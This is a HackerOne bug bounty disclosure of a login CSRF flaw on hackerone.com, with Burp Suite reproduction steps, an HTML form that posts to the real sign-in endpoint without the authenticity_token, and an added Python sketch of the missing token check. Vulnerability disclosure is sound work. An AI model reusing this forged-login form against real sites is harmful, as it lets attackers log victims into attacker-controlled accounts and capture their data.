Login CSRF vulnerability on hackerone.com
Severity: Low
Vulnerability Details
### Summary
Hi. We found a CSRF token bypass on the HackerOne login page.
So, this report describes a HackerOne login CSRF token bypass.
### Exploitation process
HackerOne sends an `authenticity_token` parameter with the login form to prevent CSRF.
However, the `authenticity_token` value is not actually verified on the sign-in request, so an attacker can complete a login via CSRF with the parameter removed entirely.
In other words, HackerOne appears to implement CSRF protection through `authenticity_token`, but the check is not enforced on login.
### Steps To Reproduce
1. Go to `https://hackerone.com/users/sign_in`
2. While logging into your account, capture the login request with Burp Suite.
3. Generate the HTML form from Burp Suite -> Engagement Tools -> Generate CSRF PoC.
4. Delete the `authenticity_token` field from the form.
5. Submit the form: the login completes without the token, so the CSRF succeeds and the submitted data is accepted :)
### PoC
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://hackerone.com/users/sign_in" method="POST">
<input type="hidden" name="user[email]" value="youremail" />
<input type="hidden" name="user[password]" value="yourpassword" />
<input type="hidden" name="user[remember_me]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
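As an added illustration of the server-side check the report says is missing (this is not HackerOne's code; `issue_session_token` and `verify_login_post` are hypothetical names), the snippet below models the Rails `authenticity_token` flow, where a per-session token is issued before the login form is rendered and must be echoed back in the POST body. It fails closed when the field is absent, which is exactly the condition the Burp-generated PoC exercises; in Rails itself the equivalent is enforcing `protect_from_forgery with: :exception` on the sign-in action.

```python
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import parse_qs


def issue_session_token() -> str:
    """Per-session secret embedded in the sign-in form as authenticity_token (hypothetical)."""
    return secrets.token_urlsafe(32)


def verify_login_post(session_token: Optional[str], body: str) -> Tuple[bool, str]:
    """Return (accepted, reason) for a POST /users/sign_in body.

    Rejects any request whose authenticity_token is absent, empty, or does not
    match the token bound to the requester's pre-login session. A cross-site
    form post cannot read that token, so a forged login is refused.
    """
    form = parse_qs(body, keep_blank_values=True)
    submitted = form.get("authenticity_token", [""])[0]

    if not session_token:
        # No pre-login session cookie arrived, so nothing can be verified.
        return False, "no pre-login session; token cannot be verified"
    if not submitted:
        # The report's PoC omits the field entirely; fail closed here.
        return False, "authenticity_token missing"
    if not hmac.compare_digest(submitted, session_token):
        # Constant-time comparison avoids leaking the token byte by byte.
        return False, "authenticity_token mismatch"
    if not form.get("user[email]", [""])[0] or not form.get("user[password]", [""])[0]:
        return False, "credentials missing"
    return True, "ok"


# Constructed body matching the fields of the Burp-generated PoC form above,
# with the authenticity_token field removed.
POC_BODY = (
    "user%5Bemail%5D=attacker%40example.com"
    "&user%5Bpassword%5D=hunter2"
    "&user%5Bremember_me%5D=1"
)

if __name__ == "__main__":
    token = issue_session_token()
    print("PoC without token:", verify_login_post(token, POC_BODY))
    print("Legitimate form:  ", verify_login_post(token, POC_BODY + "&authenticity_token=" + token))
```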
## Impact
The victim may unknowingly add sensitive payment information to the attacker's new account (see attachment {F765737}), and the victim's IP address may be recorded in the attacker's account, resulting in brute force and identity theft.
### Report Stats
- Report ID: 834366
- State: Closed
- Substate: resolved
- Upvotes: 74